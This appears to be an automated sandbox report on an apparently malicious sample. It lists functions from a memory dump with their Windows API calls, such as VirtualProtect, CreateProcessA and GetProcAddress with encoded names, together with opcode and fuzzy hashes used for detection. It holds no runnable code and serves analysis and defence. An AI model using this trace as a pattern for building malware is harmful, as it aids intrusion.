Instruction ID: 545c593adbf8e299e22cba01c8dd1b25879d3471bd02ffb502f8fa47d6753351
Opcode Fuzzy Hash: 32d3656a7ba307c5e269714c4999202807de722df94af5f6c6ccafa9f9c9c5e0
Instruction Fuzzy Hash: D511A775900615ABDB105BA4ED49BAE7BBCEF48701F001017F905E2280FB749904CE65

Uniqueness

Uniqueness Score: -1.00%

Function 04634B6D, Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000008,?,00000008,00000000,?,?,046362E2,?,6F636361,?,?,746C6153,?,?,?,726F7453), ref: 04634B81

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

mbstowcs.NTDLL ref: 04634B9B
lstrlen.KERNEL32(?,?,00000008), ref: 04634BA6
mbstowcs.NTDLL ref: 04634BC0

Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?,73BCFC30,745EC740,?,00000250,?,00000000), ref: 0462F91A
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?,?,00000000), ref: 0462F926
Part of subcall function 0462F8CE: memset.NTDLL ref: 0462F96E
Part of subcall function 0462F8CE: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0462F989
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(0000002C), ref: 0462F9C1
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?), ref: 0462F9C9
Part of subcall function 0462F8CE: memset.NTDLL ref: 0462F9EC
Part of subcall function 0462F8CE: wcscpy.NTDLL ref: 0462F9FE

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID:
API String ID: 1961997177-0
Opcode ID: 6f6caef3c2548b1ef7491816280c54ded75ed16292ace9e5945574b06f59d4cc
Instruction ID: c80ebf25fe808170ea81a8607ebe96745543f80faae1602500c6dd626657b5f0
Opcode Fuzzy Hash: 6f6caef3c2548b1ef7491816280c54ded75ed16292ace9e5945574b06f59d4cc
Instruction Fuzzy Hash: 0001B533900244B7DF116BA9DC45FCFBBADEFC5768F10502AB50592101FA75E95097A4

Uniqueness

Uniqueness Score: -1.00%

Function 04624733, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 04624740
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 04624766
lstrcpy.KERNEL32(00000014,?), ref: 0462478B
memcpy.NTDLL(?,?,?), ref: 04624798

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: a49fe66bc21acd5b3bd9851bef1a7ed936e175fa2c3ae7a71b0b5d4d86bfb9c6
Instruction ID: aec1e09fcdc56e138a8eb311a22541d818ff9b1e0eac71e923c4816af58f68a8
Opcode Fuzzy Hash: a49fe66bc21acd5b3bd9851bef1a7ed936e175fa2c3ae7a71b0b5d4d86bfb9c6
Instruction Fuzzy Hash: 39114975500619EFCB21CF58D984A9ABBF8EB49704F10841AF85687311E775E914CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 046250B1, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0463C3E0,?,00000000,00000000), ref: 046250C4
lstrlen.KERNEL32(05D3BF48,?,0463C3E0,?,00000000,00000000), ref: 046250E5
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 046250FD
lstrcpy.KERNEL32(00000000,05D3BF48), ref: 0462510F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: daab45e90b5507afa28fedca988727f5cc6b4c5972b02433794effdb15978cd6
Instruction ID: 21b8de9c4ff5e820816f97f9e68e6a0624de82c80183c2e10baa599f71205863
Opcode Fuzzy Hash: daab45e90b5507afa28fedca988727f5cc6b4c5972b02433794effdb15978cd6
Instruction Fuzzy Hash: 3901C87A900654BBCB219BA8E848F5E7BBCDB99645F144069F907E3201EA34A9048BB4

Uniqueness

Uniqueness Score: -1.00%

Function 04633130, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,7656D3B0,?,73B75520,0462D70D,00000000,05D3BB46,?,?,?,00000000), ref: 04633137
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 0463314F
memcpy.NTDLL(0000000C,?,00000001,?,00000000), ref: 04633165

Part of subcall function 0462F836: StrChrA.SHLWAPI(00000000,?,7656D3B0,05D3C0D4,00000000,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F85C
Part of subcall function 0462F836: StrTrimA.SHLWAPI(00000000,04644510,00000000,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F87B
Part of subcall function 0462F836: StrChrA.SHLWAPI(00000000,?,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F88C
Part of subcall function 0462F836: StrTrimA.SHLWAPI(00000001,04644510,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F89E

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,?,00000000), ref: 04633197

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapTrim$AllocateFreelstrlenmemcpy
String ID:
API String ID: 1635803283-0
Opcode ID: a39f2c5c3b184cc1693a9d2c5fb67b1cff8ef4c8e7f72e470f54ef1a8d774ecb
Instruction ID: dfb72c39c3693e9a1a5d01115e3a7dc0ea7d19d7a78e57a2110700c7e7643662
Opcode Fuzzy Hash: a39f2c5c3b184cc1693a9d2c5fb67b1cff8ef4c8e7f72e470f54ef1a8d774ecb
Instruction Fuzzy Hash: B601D436740741ABE7310E15EC49F277AA8EBD0B53F004029FA0596280FB64AC8A9B60

Uniqueness

Uniqueness Score: -1.00%

Function 0463CA04, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

RtlInitializeCriticalSection.NTDLL(04648380), ref: 0463CA28
RtlInitializeCriticalSection.NTDLL(04648360), ref: 0463CA3E
GetVersion.KERNEL32(?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 0463CA4F
GetModuleHandleA.KERNEL32(00001703,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 0463CA83

Part of subcall function 046244E0: GetModuleHandleA.KERNEL32(4C44544E), ref: 046244F8
Part of subcall function 046244E0: LoadLibraryA.KERNEL32(5344544E), ref: 04624599
Part of subcall function 046244E0: FreeLibrary.KERNEL32(00000000), ref: 046245A4

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: c97009240dbda09f539a50a15e7c3aa4fd47f7fd76703851e8209b1f136d6ea1
Instruction ID: cca1c1fcf298f8ce54292ebff6f8d037c47f77c442d3e3c5ae7fb2d9d82d4783
Opcode Fuzzy Hash: c97009240dbda09f539a50a15e7c3aa4fd47f7fd76703851e8209b1f136d6ea1
Instruction Fuzzy Hash: 17118BBEA00351CFDF11FFA9A88561537E5F7DA715700A42BE205E3200FA78AC108F94

Uniqueness

Uniqueness Score: -1.00%

Function 04625421, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(046483A8), ref: 0462542C
Sleep.KERNEL32(0000000A), ref: 04625436
SetEvent.KERNEL32 ref: 0462548D
RtlLeaveCriticalSection.NTDLL(046483A8), ref: 046254AC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: 929ff9367a11aedb69d0d40d67dfb0abd435b91b1af74484ba1eca2bb88a0ab9
Instruction ID: 5d142c8836726d89732079a2aca065a0ad8f78ffc7ff1ec92d9a4f66b7fafab0
Opcode Fuzzy Hash: 929ff9367a11aedb69d0d40d67dfb0abd435b91b1af74484ba1eca2bb88a0ab9
Instruction Fuzzy Hash: 9D0196B9644720FFEF10ABA0DD05B5A7A68EB54716F405021F606A7181F778AD00CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04627E6C, Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON

Download Yara Rule

APIs

Part of subcall function 04640AEA: lstrlen.KERNEL32(00000000,00000000,00000000,0463BAEB,00002334,?,?,?,?,04626BF1,?), ref: 04640AEF
Part of subcall function 04640AEA: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04640B04
Part of subcall function 04640AEA: wsprintfA.USER32 ref: 04640B20
Part of subcall function 04640AEA: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 04640B3E

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 04627E99
GetFileSize.KERNEL32(00000000,00000000), ref: 04627EA8
CloseHandle.KERNEL32(00000000), ref: 04627EB2
GetLastError.KERNEL32 ref: 04627EBA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: 99ae3c92c73b007f7a742995e5d516cea2bcad999f39f9f329ecbec4fee4fad8
Instruction ID: 7851b1ad183f134f553675fdb224c5780bf8039472b4b9596a39542096151d96
Opcode Fuzzy Hash: 99ae3c92c73b007f7a742995e5d516cea2bcad999f39f9f329ecbec4fee4fad8
Instruction Fuzzy Hash: 33F0F432101624BBDB216B65DC89F9FBE5CFF95B63F005019F50A91181FA346E918AB8

Uniqueness

Uniqueness Score: -1.00%

Function 0463D131, Relevance: 6.0, APIs: 4, Instructions: 42memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0463D165
VirtualProtect.KERNEL32(?,00000000,00000040,?), ref: 0463D177
lstrcpy.KERNEL32(?,?), ref: 0463D186
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 0463D197

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ProtectVirtual$lstrcpylstrlen
String ID:
API String ID: 288644411-0
Opcode ID: 7f43d6f6979cce488c42b4c65aa031f9fc1b591aa02cf4dda96aad22e225651b
Instruction ID: b058acce13702a2e59895ab408ae1608b4122ea1ee9fef86844ab4712e6eb8af
Opcode Fuzzy Hash: 7f43d6f6979cce488c42b4c65aa031f9fc1b591aa02cf4dda96aad22e225651b
Instruction Fuzzy Hash: 03019EB6500745DFDB31CFA0CC48AAABBB4FF48351F005649E196920B2E734E81ADF00

Uniqueness

Uniqueness Score: -1.00%

Function 04640DD1, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 04640DE3

Part of subcall function 046229AD: CreateFileW.KERNEL32(00000001,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000), ref: 046229ED
Part of subcall function 046229AD: GetLastError.KERNEL32 ref: 046229F7
Part of subcall function 046229AD: WaitForSingleObject.KERNEL32(000000C8), ref: 04622A1C
Part of subcall function 046229AD: CreateFileW.KERNEL32(00000001,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 04622A3F
Part of subcall function 046229AD: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 04622A67
Part of subcall function 046229AD: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 04622A7C
Part of subcall function 046229AD: SetEndOfFile.KERNEL32(?), ref: 04622A89
Part of subcall function 046229AD: CloseHandle.KERNEL32(?), ref: 04622AA1

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0462E0A3,0065002E,?,00001000,?,?,00001000), ref: 04640E06
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0462E0A3,0065002E,?,00001000,?,?,00001000), ref: 04640E28
GetLastError.KERNEL32(?,0462E0A3,0065002E,?,00001000,?,?,00001000), ref: 04640E3C

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: 2b589826cb53c1b24bdfb9b03d1eb16fb5639f094d220746babbd696c5bc41ea
Instruction ID: 1511053da66d89e3731ba8f901a42fb97181070a988efa5939babe8da3f36c11
Opcode Fuzzy Hash: 2b589826cb53c1b24bdfb9b03d1eb16fb5639f094d220746babbd696c5bc41ea
Instruction Fuzzy Hash: F8F0AF35200224FBEF221F609C0AF9B3B25EF85751F100010FB06A51E0FB79AA71DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 046281F5, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(04647FE0,00000000), ref: 04628201
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0462821C
lstrcpy.KERNEL32(00000000,0031302D), ref: 04628245
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04628266

Part of subcall function 0462E1B4: SetEvent.KERNEL32(?,?,04638735), ref: 0462E1C9
Part of subcall function 0462E1B4: WaitForSingleObject.KERNEL32(?,000000FF,?,?,04638735), ref: 0462E1E9
Part of subcall function 0462E1B4: CloseHandle.KERNEL32(00000000,?,04638735), ref: 0462E1F2
Part of subcall function 0462E1B4: CloseHandle.KERNEL32(00000000,?,?,04638735), ref: 0462E1FC
Part of subcall function 0462E1B4: RtlEnterCriticalSection.NTDLL(?), ref: 0462E204
Part of subcall function 0462E1B4: RtlLeaveCriticalSection.NTDLL(?), ref: 0462E21C
Part of subcall function 0462E1B4: CloseHandle.KERNEL32(?), ref: 0462E238
Part of subcall function 0462E1B4: LocalFree.KERNEL32(?), ref: 0462E243
Part of subcall function 0462E1B4: RtlDeleteCriticalSection.NTDLL(?), ref: 0462E24D

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID:
API String ID: 1103286547-0
Opcode ID: bdca0351af9b0e0d1e54fcc22bf8735c5cfc3b855a60516e24be22e3e3d3fa1e
Instruction ID: 5a8169aec0b3a1bdf395431f2449807c4a3b508dd0fe1870b4308d1ccdc68e59
Opcode Fuzzy Hash: bdca0351af9b0e0d1e54fcc22bf8735c5cfc3b855a60516e24be22e3e3d3fa1e
Instruction Fuzzy Hash: FEF0A43A34162177EF3077619D0EF463A59EBD5B66F101024B601A72C0FA68AC15CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0463A2FD, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0463A30B
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0462813A,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0463A320
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0463A5C8,?,?), ref: 0463A32D
CloseHandle.KERNEL32(?,?,?,?,0463A5C8,?,?), ref: 0463A33F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 6b63bb63fd7b1797f534430af21de778f2272a19681086067026dcf1ad5a9908
Instruction ID: 458c75b69152d8f89f2515226393b068a3af7f69120f4e60061c0e3ca5ce5287
Opcode Fuzzy Hash: 6b63bb63fd7b1797f534430af21de778f2272a19681086067026dcf1ad5a9908
Instruction Fuzzy Hash: 26F082B550430C7FE3206F62DCC4C2BBBACFF91299B11492EF182C2201FA76BC155A60

Uniqueness

Uniqueness Score: -1.00%

Function 0463F166, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,0463807B,000000FF,?,?,?,0462118D,0000003A), ref: 0463F182
GetLastError.KERNEL32(?,?,?,0462118D,0000003A,?,?,00000000,00000000,?,?,?), ref: 0463F18D
WaitNamedPipeA.KERNEL32(00002710), ref: 0463F1AF
WaitForSingleObject.KERNEL32(00000000,?,?,?,0462118D,0000003A,?,?,00000000,00000000,?,?,?), ref: 0463F1BD

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: d0200524e2ad42442963f6bfb5a4631012dd4715cf98bdb41e239fbc106498e8
Instruction ID: 5189aa2f6a220e0365da71e36dfc377ac84ea0bc9209b75a06317059cf4ed17a
Opcode Fuzzy Hash: d0200524e2ad42442963f6bfb5a4631012dd4715cf98bdb41e239fbc106498e8
Instruction Fuzzy Hash: E8F0F03AA00120ABDB302B64FC4DB577E25DB907B2F010631F919E32E0FA341C90D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04640AEA, Relevance: 6.0, APIs: 4, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,0463BAEB,00002334,?,?,?,?,04626BF1,?), ref: 04640AEF
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04640B04
wsprintfA.USER32 ref: 04640B20

Part of subcall function 0463990C: memset.NTDLL ref: 04639921
Part of subcall function 0463990C: lstrlenW.KERNEL32(00000000,00000000,00000000,7711DBB0,00000020,00000000), ref: 0463995C
Part of subcall function 0463990C: wcstombs.NTDLL ref: 04639966
Part of subcall function 0463990C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7711DBB0,00000020,00000000), ref: 0463999A
Part of subcall function 0463990C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04621060), ref: 046399C6
Part of subcall function 0463990C: TerminateProcess.KERNEL32(?,000003E5), ref: 046399DC
Part of subcall function 0463990C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04621060), ref: 046399F0
Part of subcall function 0463990C: CloseHandle.KERNEL32(?), ref: 04639A23
Part of subcall function 0463990C: CloseHandle.KERNEL32(?), ref: 04639A28

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 04640B3E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID:
API String ID: 1624158581-0
Opcode ID: 8505d346ea1a53308b40f07b2063f51858931fa42c41d78c08214f0f8f19310f
Instruction ID: 63ec54118af5a06cfe3715e32401cfa1ffb5a4c38dcdf57370a55caa755dcb4b
Opcode Fuzzy Hash: 8505d346ea1a53308b40f07b2063f51858931fa42c41d78c08214f0f8f19310f
Instruction Fuzzy Hash: 97F0E93E200110BBDF201729EC09F577B6CDBC2B25F151121F505D72D1FB689D158AB8

Uniqueness

Uniqueness Score: -1.00%

Function 04632ABC, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04632ADB

Part of subcall function 0462519B: RtlEnterCriticalSection.NTDLL(00000000), ref: 046251A7
Part of subcall function 0462519B: CloseHandle.KERNEL32(?), ref: 046251B5
Part of subcall function 0462519B: RtlLeaveCriticalSection.NTDLL(00000000), ref: 046251D1

CloseHandle.KERNEL32(?), ref: 04632AE9
InterlockedDecrement.KERNEL32(04647FDC), ref: 04632AF8

Part of subcall function 0462293C: SetEvent.KERNEL32(000003B4,04632B13), ref: 04622946
Part of subcall function 0462293C: CloseHandle.KERNEL32(000003B4), ref: 0462295B
Part of subcall function 0462293C: HeapDestroy.KERNEL32(05940000), ref: 0462296B

RtlExitUserThread.NTDLL(00000000), ref: 04632B14

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
String ID:
API String ID: 1141245775-0
Opcode ID: 49451631cebed3f00f033d0f5a0008560624debbcfcc1ba2367d78e120e0f344
Instruction ID: 0679b82a67667388d9e9baf6b72d1f37df978e0b6e06e46fe3ee535a91e8a4c2
Opcode Fuzzy Hash: 49451631cebed3f00f033d0f5a0008560624debbcfcc1ba2367d78e120e0f344
Instruction Fuzzy Hash: F5F0C834600610BFEB01AF689C0AF693B38EB85B35B104248F526932C0FBB4BC41CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0462557B, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05D3C0A0), ref: 04625584
Sleep.KERNEL32(0000000A,?,00000000), ref: 0462558E
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046255B6
RtlLeaveCriticalSection.NTDLL(05D3C0A0), ref: 046255D4

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: a2b89862d558a11b0d1ac7e22d9f50386530d4050b56c9e139f83b7614fc0889
Instruction ID: 9195c8e41111fb8a4296192307d9235456e485a914325871d0ad468041142cc0
Opcode Fuzzy Hash: a2b89862d558a11b0d1ac7e22d9f50386530d4050b56c9e139f83b7614fc0889
Instruction Fuzzy Hash: 08F030BD201601BFEB20AB64D949F4A77A5EB54B40B009404F406D7251F638EC55CF58

Uniqueness

Uniqueness Score: -1.00%

Function 04622374, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05D3C0A0), ref: 0462237D
Sleep.KERNEL32(0000000A,?,00000000), ref: 04622387
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 046223B5
RtlLeaveCriticalSection.NTDLL(05D3C0A0), ref: 046223CA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: de88b995acbbcdf9105939353993916c67551e3f90e66908e00623b1efe76baa
Instruction ID: 4d1d17d82ce1a367d1532f7f85318891c02dd486b2b06218ec98eeba78476fbb
Opcode Fuzzy Hash: de88b995acbbcdf9105939353993916c67551e3f90e66908e00623b1efe76baa
Instruction Fuzzy Hash: 68F03A7C200601AFEF189FA4D85AF1673A1EB88B41B00A045E802C7390FA3CEC11CE25

Uniqueness

Uniqueness Score: -1.00%

Function 04630AB1, Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04630D7B

Part of subcall function 04624248: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,00008664,?,0462E4FE,0462E4FE,?,04630BCB,?,0462E4FE,?,?,00000000), ref: 0462426D
Part of subcall function 04624248: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0462428F
Part of subcall function 04624248: GetProcAddress.KERNEL32(00000000,614D775A), ref: 046242A5
Part of subcall function 04624248: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046242BB
Part of subcall function 04624248: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046242D1
Part of subcall function 04624248: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046242E7

Part of subcall function 0462274C: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,0462E4FE,?,?,00000000), ref: 046227C0
Part of subcall function 0462274C: memcpy.NTDLL(?,?,?), ref: 04622827

memcpy.NTDLL(?,?,?,0462E4FE,?,?,?,?,?,0462E4FE,?,?,00000000), ref: 04630C2A

Part of subcall function 0462AD2B: GetModuleHandleA.KERNEL32(4C44544E,?,?,04630CE8,?,?,?,00000000), ref: 0462AD69
Part of subcall function 0462AD2B: memcpy.NTDLL(?,0464828C,00000018,7250775A,4772644C,4C72644C), ref: 0462ADE5

memcpy.NTDLL(?,?,00000018,0462E4FE,?,?,?,?,?,0462E4FE,?,?,00000000), ref: 04630C78
memcpy.NTDLL(?,04639AF3,00000800,?,?,?,00000000), ref: 04630CFB

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: memcpy$AddressProc$HandleModule$memset
String ID:
API String ID: 1554640953-0
Opcode ID: 25e372696d1c6de905bdbb1b691899a5093cceef884ae964bfaa781417cc5188
Instruction ID: f8de7674b6f8e64c9a1212b5f803a19136e04785d1206b53525ef7407a456577
Opcode Fuzzy Hash: 25e372696d1c6de905bdbb1b691899a5093cceef884ae964bfaa781417cc5188
Instruction Fuzzy Hash: 02A149B5A0064AEFDF11DF98C980BAEBBF4FF04305F14446AD801A7254E774BA88DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0463BFD1, Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0463C02D
CloseHandle.KERNEL32(?,?,00000100,?,22207C20,046241EA,00000000), ref: 0463C07B
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,04626BE2,00000000,046241EA,0463C8F5,00000000,046241EA,04631130,00000000,046241EA,0462486C,00000000), ref: 0463C386
GetLastError.KERNEL32(?,00000000,?), ref: 0463C663

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: c6cdd96da01c7e7f2cd9054c0400f0a9f4b1b01f80c2c83af7a49f151ed8c13c
Instruction ID: 1a4c9aea55672d7f011f72303c7d09e45755975aabc0eb8af00c9d646d53e231
Opcode Fuzzy Hash: c6cdd96da01c7e7f2cd9054c0400f0a9f4b1b01f80c2c83af7a49f151ed8c13c
Instruction Fuzzy Hash: 38510873300695BBEF11AF70DC44FAE3668EB82756F005025B905F2180FE75BD62AA56

Uniqueness

Uniqueness Score: -1.00%

Function 04636DB2, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04636DD8
memcpy.NTDLL ref: 04636E00

Part of subcall function 0462F19E: RtlNtStatusToDosError.NTDLL(00000000), ref: 0462F1D6
Part of subcall function 0462F19E: SetLastError.KERNEL32(00000000), ref: 0462F1DD

GetLastError.KERNEL32(00000010,00000218,0464286D,00000100,?,00000318,00000008), ref: 04636E17
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0464286D,00000100), ref: 04636EFA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: 709c01196928c5cae4359b8352b8a32570448807b5a8a37c417e3864480389c6
Instruction ID: 626b949a7a339068740ba5913d7e81e4e93a079d248ef5e77714347144c0bb57
Opcode Fuzzy Hash: 709c01196928c5cae4359b8352b8a32570448807b5a8a37c417e3864480389c6
Instruction Fuzzy Hash: 67416FB1504741AFEB30DF28CC41BABBBE9EB98715F00892DF599C6250F770E5188B66

Uniqueness

Uniqueness Score: -1.00%

Function 046224A3, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 046211C1: lstrlenW.KERNEL32(?), ref: 046211E5
Part of subcall function 046211C1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046211F7
Part of subcall function 046211C1: wcstombs.NTDLL ref: 04621205
Part of subcall function 046211C1: lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 04621229
Part of subcall function 046211C1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0462123E
Part of subcall function 046211C1: mbstowcs.NTDLL ref: 0462124B
Part of subcall function 046211C1: HeapFree.KERNEL32(00000000,00000000), ref: 0462125D
Part of subcall function 046211C1: HeapFree.KERNEL32(00000000,00000000,?,?), ref: 04621277

GetLastError.KERNEL32 ref: 04622542

